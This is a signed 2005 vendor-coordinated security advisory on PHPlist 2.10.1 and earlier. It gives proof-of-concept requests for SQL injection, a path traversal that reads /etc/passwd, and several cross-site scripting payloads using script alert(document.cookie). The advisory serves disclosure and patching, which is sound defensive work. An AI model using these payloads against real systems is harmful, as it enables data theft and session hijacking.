-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Advisory: Multiple vulnerabilities in PHPlist
Name: TKADV2005-11-001
Revision: 1.0
Release Date: 2005/11/07
Last Modified: 2005/11/07
Author: Tobias Klein (tk at trapkit.de)
Affected Software: PHPlist (all versions <= 2.10.1)
Risk: Critical ( ) High (x) Medium (x) Low (x)
Vendor URL: http://www.phplist.com/
Vendor Status: Vendor has released an updated version
=========
Overview:
=========
PHPlist is a double opt-in newsletter manager. It is written in
PHP and uses a SQL database for storing the information.
Version 2.10.1 and prior contain multiple Cross Site Scripting
and SQL Injection vulnerabilities. Furthermore it is possible to
access and read arbitrary system files through a vulnerability in
PHPlist.
======================
Vulnerability details:
======================
All vulnerabilites are only exploitable by a legitimate user who is
logged in to PHPlist. So the probability of occurrence of most
threats is rated as medium. The probability of occurrence of the
non-persistent Cross Site Scripting vulnerabilities is even rated
as low.
For a description of the calculation of the resulting threat of a
vulnerability see reference [3].
All vulnerabilities are exploitable, no matter if magic_quotes_gpc
is turned on or off.
[1] SQL Injection
Possible damage: Critical
Probability of occurrence: Medium
Resulting threat: High
HTTP method: GET
Vulnerability description:
PHPlist is prone to a SQL injection vulnerability. This issue is
due to a lack of proper sanitization of user-supplied input before
using it in an SQL query.
Successful exploitation could result in a compromise of the
application, disclosure or modification of data, or may permit an
attacker to exploit vulnerabilities in the underlying database
implementation.
Vulnerable URL:
[path_to_phplist]/lists/admin/?page=admin&id=
Proof of Concept:
[path_to_phplist]/lists/admin/?page=admin&id=1'
[2] SQL Injection
Possible damage: Critical
Probability of occurrence: Medium
Resulting threat: High
HTTP method: GET
Vulnerability description:
PHPlist is prone to a SQL injection vulnerability. This issue is
due to a lack of proper sanitization of user-supplied input before
using it in an SQL query.
Successful exploitation could result in a compromise of the
application, disclosure or modification of data, or may permit an
attacker to exploit vulnerabilities in the underlying database
implementation.
Vulnerable URL:
[path_to_phplist]/lists/admin/?page=editattributes&id=
Proof of Concept:
[path_to_phplist]/lists/admin/?page=editattributes&id=1'
[3] SQL Injection
Possible damage: Critical
Probability of occurrence: Medium
Resulting threat: High
HTTP method: POST
Vulnerability description:
PHPlist is prone to a SQL injection vulnerability. This issue is
due to a lack of proper sanitization of user-supplied input before
using it in an SQL query.
Successful exploitation could result in a compromise of the
application, disclosure or modification of data, or may permit an
attacker to exploit vulnerabilities in the underlying database
implementation.
Vulnerable URL:
[path_to_phplist]/lists/admin/?page=admin&id=1
Vulnerable POST parameter: id=
Proof of Concept (POST request):
POST [path_to_phplist]/lists/admin/?page=admin&id=1 HTTP/1.1
[...]
id=1'&loginname=admin&email=&password=phplist&superuser=1&
disabled=0&change=Save+Changes
[4] Read arbitrary system files
Possible damage: Critical
Probability of occurrence: Medium
Resulting threat: High
HTTP method: POST
Vulnerability description:
PHPlist is prone to a vulnerability that permits read access to
arbitrary files.
Successful exploitation of this vulnerability will grant the
attacker read access to arbitrary files on the system in the
security context of the webserver process.
Details:
(a) Configure attributes
Go to the following URL:
[path_to_phplist]/lists/admin/?page=attributes
Now load data from predefined defaults (see following URL).
[path_to_phplist]/lists/admin/?page=defaults
(b) Add predefined value
For example: "Provinces in Canada"
(c) Manipulate POST request
Vulnerable POST parameter: selected%5B%5D=
Original value : selected%5B%5D=can-provinces.txt
Manipulated value:
selected%5B%5D=/../../../../../../../etc/passwd
POST request:
POST [path_to_phplist]/lists/admin/?page=defaults HTTP/1.1
[...]
selected%5B%5D=/../../../../../../../etc/passwd
(d) Check
Go to the user management:
[path_to_phplist]/lists/admin/?page=usermgt
Choose the "Control values for" link:
[path_to_phplist]/lists/admin/?page=editattributes&id=1
You should see the contents of the local password file.
[5] Cross Site Scripting
Possible damage: High
Probability of occurrence: Medium
Resulting threat: Medium
HTTP method: POST
Vulnerability description:
The "listname" parameter is prone to cross-site scripting attacks.
This could permit an attacker to embed a malicious link into the
context of the web application that includes hostile client-side
script code or HTML. If the appropriate site within the application
is visited, the attacker-supplied code is rendered in the browser
of the user who visits the site. No further user interaction is
needed.
URL with vulnerable POST request:
[path_to_phplist]/lists/admin/?page=editlist
Details:
(a) Manipulate POST request
Vulnerable POST parameter: listname=
Original value : listname=
Manipulated value:
listname="><script>alert(document.cookie)</script>
POST request:
POST [path_to_phplist]/lists/admin/?page=editlist HTTP/1.1
[...]
id=0&listname="><script>alert(document.cookie)</script>
&listorder=&owner=1&description=&save=Save
(b) Check
The malicious code gets executed when a user visits the following
URL:
[path_to_phplist]/lists/admin/?page=list
[6] Cross Site Scripting
Possible damage: High
Probability of occurrence: Medium
Resulting threat: Medium
HTTP method: POST
Vulnerability description:
The "title" parameter is prone to cross-site scripting attacks.
This could permit an attacker to embed a malicious link into the
context of the web application that includes hostile client-side
script code or HTML. If the appropriate site within the application
is visited, the attacker-supplied code is rendered in the browser
of the user who visits the site. No further user interaction is
needed.
URL with vulnerable POST Request:
[path_to_phplist]/lists/admin/?page=spageedit
Details:
(a) Manipulate POST request
Vulnerable POST parameter: title=
Original value : title=
Manipulated value:
title=><script>alert(document.cookie)</script>
POST request:
POST [path_to_phplist]/lists/admin/?page=spageedit HTTP/1.1
[...]
id=3&title="><script>alert(document.cookie)</script>&[...]
(b) Check
The malicious code gets executed when a user visits the following
URL:
[path_to_phplist]/lists/admin/?page=spage
[7] Cross Site Scripting
Possible damage: High
Probability of occurrence: Medium
Resulting threat: Medium
HTTP method: POST
Vulnerability description:
The "title" form-data is prone to cross-site scripting attacks.
This could permit an attacker to embed a malicious link into the
context of the web application that includes hostile client-side
script code or HTML. If the appropriate site within the application
is visited, the attacker-supplied code is rendered in the browser
of the user who visits the site. No further user interaction is
needed.
URL with vulnerable POST Request:
[path_to_phplist]/lists/admin/?page=template
Details:
(a) Manipulate POST request
Vulnerable POST parameter: form-data; name="title"
Manipulated value:
form-data; name="title"
"><script>alert(document.cookie)</script>
POST request:
POST [path_to_phplist]/lists/admin/?page=template HTTP/1.1
[...]
-----------------------------1474118359509
Content-Disposition: form-data; name="id"
0
-----------------------------1474118359509
Content-Disposition: form-data; name="title"
"><script>alert(document.cookie)</script>
-----------------------------1474118359509
Content-Disposition: form-data; name="file_template";
filename=""
Content-Type: application/octet-stream
-----------------------------1474118359509
Content-Disposition: form-data; name="content"
[CONTENT]
-----------------------------1474118359509
Content-Disposition: form-data; name="save"
Save Changes
-----------------------------1474118359509--
(b) Check
The malicious code gets executed when a user visits the following
URL:
[path_to_phplist]/lists/admin/?page=templates
[8] Cross Site Scripting
Possible damage: Medium
Probability of occurrence: Low
Resulting threat: Low
HTTP method: GET
Vulnerability description:
The "?page=eventlog&s=0&filter=" parameter is prone to cross-site
scripting attacks. This could permit remote attackers to create a
malicious link to a vulnerable PHP script that includes hostile
client-side script code or HTML. If this link is visited, the
attacker-supplied code may be rendered in the browser of the user
who visit the malicious link.
Proof of Concept:
[path_to_phplist]/lists/admin/?page=eventlog&s=0&filter="><script>
alert(document.cookie)</script>
[9] Cross Site Scripting
Possible damage: Medium
Probability of occurrence: Low
Resulting threat: Low
HTTP method: GET
Vulnerability description:
The "?page=eventlog&start=&delete=" parameter is prone to cross-site
scripting attacks. This could permit remote attackers to create a
malicious link to a vulnerable PHP script that includes hostile
client-side script code or HTML. If this link is visited, the
attacker-supplied code may be rendered in the browser of the user
who visit the malicious link.
Proof of Concept:
[path_to_phplist]/lists/admin/?page=eventlog&start=&delete=">
<script>alert(document.cookie)</script>
[10] Cross Site Scripting
Possible damage: Medium
Probability of occurrence: Low
Resulting threat: Low
HTTP method: GET
Vulnerability description:
The "?page=eventlog&start=" parameter is prone to cross-site
scripting attacks. This could permit remote attackers to create a
malicious link to a vulnerable PHP script that includes hostile
client-side script code or HTML. If this link is visited, the
attacker-supplied code may be rendered in the browser of the user
who visit the malicious link.
Proof of Concept:
[path_to_phplist]/lists/admin/?page=eventlog&start="><script>alert
(document.cookie)</script>
[11] Cross Site Scripting
Possible damage: Medium
Probability of occurrence: Low
Resulting threat: Low
HTTP method: GET
Vulnerability description:
The "?page=configure&id=" parameter is prone to cross-site
scripting attacks. This could permit remote attackers to create a
malicious link to a vulnerable PHP script that includes hostile
client-side script code or HTML. If this link is visited, the
attacker-supplied code may be rendered in the browser of the user
who visit the malicious link.
Proof of Concept:
[path_to_phplist]/lists/admin/?page=configure&id="><script>alert
(document.cookie)</script>
[12] Cross Site Scripting
Possible damage: Medium
Probability of occurrence: Low
Resulting threat: Low
HTTP method: GET
Vulnerability description:
The "?page=users&find=" parameter is prone to cross-site
scripting attacks. This could permit remote attackers to create a
malicious link to a vulnerable PHP script that includes hostile
client-side script code or HTML. If this link is visited, the
attacker-supplied code may be rendered in the browser of the user
who visit the malicious link.
Proof of Concept:
[path_to_phplist]/lists/admin/?page=users&find="><script>alert
(document.cookie)</script>
[13] Cross Site Scripting
Possible damage: Medium
Probability of occurrence: Low
Resulting threat: Low
HTTP method: GET
Vulnerability description:
The "?page=admin&start=" parameter is prone to cross-site
scripting attacks. This could permit remote attackers to create a
malicious link to a vulnerable PHP script that includes hostile
client-side script code or HTML. If this link is visited, the
attacker-supplied code may be rendered in the browser of the user
who visit the malicious link.
Proof of Concept:
[path_to_phplist]/lists/admin/?page=admin&start="><script>alert
(document.cookie)</script>
[14] Cross Site Scripting
Possible damage: Medium
Probability of occurrence: Low
Resulting threat: Low
HTTP method: GET
Vulnerability description:
The "?page=fckphplist&action=" parameter is prone to cross-site
scripting attacks. This could permit remote attackers to create a
malicious link to a vulnerable PHP script that includes hostile
client-side script code or HTML. If this link is visited, the
attacker-supplied code may be rendered in the browser of the user
who visit the malicious link.
Proof of Concept:
[path_to_phplist]/lists/admin/?page=fckphplist&action="><script>
alert(document.cookie)</script>
=========
Solution:
=========
Upgrade to PHPlist 2.10.2 or newer.
http://www.phplist.com/files/
========
History:
========
2005/11/02 - Vendor notified
2005/11/02 - Vendor response
2005/11/07 - Release of new PHPlist version
2005/11/07 - Public release
========
Credits:
========
Vulnerabilities found and advisory written by Tobias Klein.
===========
References:
===========
[1] http://tincan.co.uk/?lid=1632
[2] http://www.trapkit.de/advisories/TKADV2005-11-001.txt
[3] http://www.trapkit.de/advisories/TKADVcortav.txt
========
Changes:
========
Revision 0.1 - Initial draft release to the vendor
Revision 1.0 - Public release
===========
Disclaimer:
===========
The information within this advisory may change without notice. Use
of this information constitutes acceptance for use in an AS IS
condition. There are no warranties, implied or express, with regard
to this information. In no event shall the author be liable for any
direct or indirect damages whatsoever arising out of or in connection
with the use or spread of this information. Any use of this
information is at the user's own risk.
The copyright for any material created by the author is reserved. Any
duplication of codes or texts provided here in electronic or printed
publications is not permitted without the author's agreement.
==================
PGP Signature Key:
==================
http://www.trapkit.de/advisories/tk-advisories-signature-key.asc
Copyright 2005 Tobias Klein. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1
iQA/AwUBQ2+pdpF8YHACG4RBEQLtgwCgr/c/Vf73SpIWq+yeChp9r15oHi0AnRJS
OYPcgyVchLXfFZE912nenHcE
=MG/M
-----END PGP SIGNATURE-----